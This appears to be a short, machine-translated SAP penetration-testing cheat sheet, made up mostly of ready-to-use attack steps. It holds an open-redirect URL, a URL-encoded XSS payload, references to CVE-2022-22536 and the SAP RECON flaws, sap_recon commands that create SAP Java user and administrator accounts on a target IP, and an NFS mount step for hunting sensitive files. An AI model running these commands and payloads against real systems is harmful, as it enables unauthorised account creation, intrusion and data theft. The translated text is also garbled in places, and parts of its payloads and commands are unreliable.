ビスミラ
ペンテストを実行するには、ネットワークにSAPシステムを展開する必要があります
https:// host/sap/public/bc/icf/logoff?redirecturl = maliousurl
http:// host:port/startpage
http:// host:port/sap/public/info
http:// host:port/sap/public/info
/sapirexthelp https:// localhost/sapirexthelpを探してください
https:// host/sapirexthelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31 %30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36 %33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%23%78%32%65%26 %23%78%36%34%26%23%78%36%66%26%23%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3E.ASP
SAP情報システム1.0シェルアップロード
CVE-2022-22536(ICMAD SAP)
SAP Reconの脆弱性(CVE-2020-6287、CVE-2020-6286)
https://github.com/chipik/sap_recon
zipファイルをダウンロードします
python recon.py -h 172.16.30.8 -f /1111.zip
SAP Javaユーザーを作成します
Python Recon.py -H 172.16.30.8 -U
SAP Java管理者ユーザーを作成します
python recon.py -h 172.16.30.8 -a
SSLSCAN
NFS-LSNFS:// host/mount
mkdir mnt && mount -t nfs host:/mount ./mnt
繊細な情報を探してください
Pentestシミュレーションを行うためのSAP仮想マシンまたはコンテナを探しています。情報があれば、親切にdm me @linkedin)
共有は思いやりがあります
كeshالصل可اللهعليهوسلم: "